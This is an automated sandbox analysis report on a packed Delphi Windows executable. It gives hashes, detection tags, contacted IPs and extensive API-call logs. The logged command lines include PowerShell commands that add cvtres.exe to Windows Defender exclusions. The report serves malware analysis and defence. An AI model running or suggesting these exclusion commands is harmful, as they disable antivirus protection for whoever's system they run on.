popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

licarisan_api.exe

Generic Malware UPX Malicious Library Malicious Packer Downloader Antivirus task schedule HTTP ScreenShot Create Service KeyLogger Internet API DGA Http API persistence FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 6, 2024, 6:15 p.m. Oct. 6, 2024, 6:27 p.m.
Size 3.9MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 65a683124fc4ca1839e95322370e2b0d
SHA256 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
CRC32 A6BC9B2F
ssdeep 49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • mzp_file_format - MZP(Delphi) file format

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.196.220.62 Active Moloch
193.142.146.64 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e5f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035efb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eb70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eb70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eb70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eb70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eb70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035eb70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039b838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039b978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039b978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039b978
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039b178
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039b178
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .itext
packer BobSoft Mini Delphi -> BoB / BobSoft
resource name MAD
resource name PNG
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x3c70c04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 69
exception.instruction: cmp dword ptr [rip + 0x2d18d], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x3c70c04
registers.r14: 0
registers.r15: 8791654130368
registers.rcx: 48
registers.rsi: 2097158
registers.r10: 0
registers.rbx: 0
registers.rsp: 83556728
registers.r11: 83557280
registers.r8: 2004779404
registers.r9: 0
registers.rdx: 8796092600912
registers.r12: 4294967295
registers.rbp: 83556848
registers.rdi: 0
registers.rax: 63376384
registers.r13: 8791654130368
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 98304
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00420000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 53248
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a5000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 660
region_size: 100003840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02220000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007ac000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 16384
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 53248
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 20480
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007bd000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 212992
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 184320
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 512000
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00724000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 660
region_size: 532480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 192512
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 167936
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007fa000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 512000
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00724000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 720896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00590000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d42000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0066b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0064c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02270000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02271000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02272000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0064a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02273000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ae0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0049a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
name RT_ICON language LANG_CHINESE filetype dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x002d7b78 size 0x00010828
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x003247a4 size 0x00000014
name RT_MANIFEST language LANG_CHINESE filetype XML 1.0 document, ASCII text, with CRLF line terminators sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00422a4c size 0x00000352
file C:\Users\test22\Music\OcoulsUpdater\EyesUpdater.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
cmdline powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
cmdline powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
cmdline cmd /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
cmdline "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
cmdline "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
cmdline cmd /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
filepath: cmd
1 1 0
section {u'size_of_data': u'0x00041000', u'virtual_address': u'0x000af000', u'entropy': 7.410450162378425, u'name': u'.bss', u'virtual_size': u'0x00041000'} entropy 7.41045016238 description A section with a high entropy has been found
section {u'size_of_data': u'0x00312e00', u'virtual_address': u'0x00110000', u'entropy': 6.802148619056981, u'name': u'.rsrc', u'virtual_size': u'0x00312d9e'} entropy 6.80214861906 description A section with a high entropy has been found
entropy 0.813925713603 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
